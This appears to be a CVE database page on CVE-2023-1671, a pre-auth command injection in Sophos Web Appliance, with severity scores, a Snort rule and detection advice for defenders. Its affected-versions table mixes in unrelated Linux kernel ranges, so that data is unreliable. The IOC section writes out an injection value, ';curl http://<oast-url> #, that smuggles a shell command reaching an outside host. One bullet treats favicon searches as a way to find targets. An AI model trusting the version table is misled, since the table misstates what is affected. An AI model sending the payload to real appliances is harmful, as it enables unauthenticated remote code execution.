cbcvebase.
CVE-2023-1671
published 2023-04-04

CVE-2023-1671: A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2023-12-07
Exploited in the wild
EPSS
100.00%
100.0th percentile
A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.

Affected

5 ranges
VendorProductVersion rangeFixed in
linuxlinux_kernel>= 5.13.0 < 5.15.1215.15.121
linuxlinux_kernel>= 5.16.0 < 6.1.406.1.40
linuxlinux_kernel>= 6.2.0 < 6.4.56.4.5
sophossophos_web_appliance>= unspecified < 4.3.10.44.3.10.4
sophosweb_appliance< 4.3.10.44.3.10.4

Detection & IOCsextracted from sources · hover to see the quote

url/index.php?c=blocked&action=continue
path/index.php?c=blocked&action=continue
commandargs_reason=filetypewarn&url=<rand>&filetype=<rand>&user=<rand>&user_encoded=<base64("';curl http://<oast-url> #")>
otherhttp.favicon.hash:-893681401
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Sophos Web Appliance Pre-Auth Command Injection Attempt (CVE-2023-1671)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:36; content:"|2f|index|2e|php|3f|c|3d|blocked|26|action|3d|continue"; http.request_body; content:"args_reason=filetypewarn&url="; startswith; fast_pattern; content:"&filetype="; content:"&user_encoded="; reference:url,sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce; classtype:attempted-admin; sid:2049632; rev:2; metadata:attack_target Client_Endpoint, created_at 2023_12_11, cve CVE_2023_1671, deployment Perimeter, deployment SSLDecrypt, confidence High, signature_severity Major, tag cve_2023_1671, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_27, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
bytes
|2f|index|2e|php|3f|c|3d|blocked|26|action|3d|continue
  • Look for HTTP POST requests to /index.php with query parameters c=blocked&action=continue — this is the vulnerable warn-proceed handler endpoint.
  • Inspect POST body for the pattern: args_reason=filetypewarn combined with a user_encoded parameter containing base64-encoded shell metacharacters (e.g., single-quote, semicolon, shell commands).
  • Detect out-of-band callback activity (DNS/HTTP) from the Sophos Web Appliance host, which would indicate successful command injection via the user_encoded parameter.
  • Use Shodan/FOFA to identify exposed Sophos Web Appliance instances via title or favicon hash as potential targets.
  • The exploit is pre-authentication — no session cookie or login is required. Any POST to the vulnerable endpoint from an unauthenticated source should be treated as suspicious.
  • ET Snort SID 2049632 (rev:2) covers this exploit attempt; ensure IDS/IPS rules are updated to at least this revision.
  • ·The Snort/ET rule requires SSL decryption to be effective, as the appliance is typically accessed over HTTPS.
  • ·Sophos Web Appliance reached end-of-life on July 20, 2023 and no longer receives updates; patching to 4.3.10.4 was delivered as an automatic patch on April 4, 2023, but only applies to instances that did not disable auto-patch.
  • ·The URI bsize match in the Snort rule is exactly 36 bytes; ensure the rule engine supports the bsize keyword correctly to avoid false negatives.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.